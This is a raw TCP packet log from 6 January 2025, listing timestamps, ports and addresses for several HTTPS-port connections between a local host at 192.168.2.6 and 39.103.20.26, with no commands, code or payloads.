Jan 6, 2025 04:50:39.262450933 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.262458086 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.262487888 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.262495995 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.263470888 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.263531923 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.264641047 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.264694929 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.264807940 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.264857054 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.266428947 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.266480923 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.347837925 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.347896099 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.347901106 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.347915888 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.347942114 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.347949982 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.348334074 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.348365068 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.348378897 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.348382950 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.348392010 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.348407030 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.348423004 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.348427057 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.348439932 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.348469973 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.348792076 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.348819017 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.348834991 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.348839998 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.348862886 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.348870039 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.349399090 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.349443913 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.349490881 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.349526882 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.349533081 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.349536896 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.349565029 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.349575996 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.349945068 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.349992037 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.350163937 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.350209951 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.350430965 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.350477934 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.351221085 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.351275921 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.353102922 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.353154898 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.353190899 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.353233099 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.434632063 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.434765100 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.434792995 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.434844971 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.434844971 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.434859037 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.434906960 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.434912920 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.434921980 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.434958935 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.436104059 CET	49931	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.436119080 CET	443	49931	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.458069086 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.458116055 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:39.458201885 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.458400011 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:39.458417892 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:40.678442955 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:40.678607941 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:40.678895950 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:40.678904057 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:40.679095984 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:40.679104090 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.018997908 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.019016981 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.019068956 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.019099951 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.019113064 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.019149065 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.019558907 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.019618034 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.020778894 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.020840883 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.024374008 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.024435043 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.111213923 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.111391068 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.111651897 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.111718893 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.112154007 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.112211943 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.112637997 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.112689018 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.113400936 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.113435030 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.113459110 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.113468885 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.113487959 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.113512039 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.115056038 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.115112066 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.115508080 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.115562916 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.116877079 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.116929054 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.203517914 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.203630924 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.203696012 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.203752041 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.203815937 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.203866959 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.204019070 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.204071999 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.204246044 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.204293966 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.204312086 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.204375029 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.204898119 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.204935074 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.204952955 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.204960108 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.204972982 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.204976082 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.204999924 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.205007076 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.205035925 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.205060005 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.205475092 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.205530882 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.205548048 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.205601931 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.205842018 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.205890894 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.207340956 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.207395077 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.207520962 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.207566023 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.209176064 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.209234953 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.209235907 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.209248066 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.209271908 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.209290981 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.295998096 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.296036005 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.296066046 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.296082020 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.296093941 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.296132088 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.296153069 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.296911955 CET	49942	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.296928883 CET	443	49942	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.328804016 CET	49953	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.328818083 CET	443	49953	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:41.328882933 CET	49953	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.329035997 CET	49953	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:41.329047918 CET	443	49953	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:42.512820959 CET	443	49953	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:42.512902021 CET	49953	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:42.513278008 CET	49953	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:42.513284922 CET	443	49953	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:42.513498068 CET	49953	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:42.513503075 CET	443	49953	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:42.843882084 CET	443	49953	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:42.843908072 CET	443	49953	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:42.844019890 CET	49953	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:42.844075918 CET	443	49953	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:42.844253063 CET	49953	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:42.844471931 CET	443	49953	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:42.844532967 CET	49953	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:42.844871044 CET	443	49953	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:42.844932079 CET	49953	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:42.844933033 CET	443	49953	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:42.844980955 CET	49953	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:42.845190048 CET	49953	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:42.845225096 CET	443	49953	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:42.845254898 CET	49953	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:42.845278025 CET	49953	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:42.857770920 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:42.857786894 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:42.857872009 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:42.858067989 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:42.858078957 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.108333111 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.108470917 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.109091043 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.109097958 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.109312057 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.109317064 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.445549965 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.445574999 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.445617914 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.445630074 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.445652962 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.445703030 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.446109056 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.446160078 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.447381020 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.447446108 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.451359034 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.451422930 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.532115936 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.532177925 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.532191992 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.532212019 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.532238007 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.532311916 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.533363104 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.533401966 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.533416986 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.533421993 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.533451080 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.533463001 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.534097910 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.534157991 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.534732103 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.534797907 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.535958052 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.536011934 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.536317110 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.536360025 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.538060904 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.538113117 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.618798018 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.618839979 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.618880987 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.618891001 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.619033098 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.619033098 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.619119883 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.619175911 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.619340897 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.619398117 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.619729042 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.619772911 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.619784117 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.619787931 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.619816065 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.619817972 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.619838953 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.619843006 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.619852066 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.619868994 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.619903088 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.619906902 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.619949102 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.620541096 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.620593071 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.620620966 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.620667934 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.621193886 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.621237040 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.621251106 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.621254921 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.621280909 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.621300936 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.621575117 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.621620893 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.622631073 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.622692108 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.624716997 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.624773026 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.666809082 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.666903973 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.705627918 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.705671072 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.705703974 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.705715895 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.705743074 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.705745935 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.705761909 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.705766916 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.705795050 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.705823898 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.705831051 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.705878973 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.705881119 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.705890894 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.705924034 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.705936909 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.705943108 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.705949068 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.705987930 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.705990076 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.706017971 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.706022978 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.706048965 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.706077099 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.706238031 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.706285954 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.706296921 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.706300974 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.706331968 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.706334114 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.706374884 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.706379890 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.706410885 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.706434965 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.706836939 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.706892014 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.708770037 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.708827972 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.712860107 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.712929964 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.714905024 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.714987993 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.716909885 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.716969967 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.721036911 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.721096039 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.723125935 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.723208904 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.727222919 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.727308989 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.729279995 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.729338884 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.731355906 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.731414080 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.735420942 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.735483885 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.737507105 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.737586975 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.741556883 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.741610050 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.743616104 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.743666887 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.745711088 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.745768070 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.749835014 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.749911070 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.751725912 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.751785040 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.755976915 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.756036043 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.757910967 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.757972002 CET	49962	443	192.168.2.6	39.103.20.26
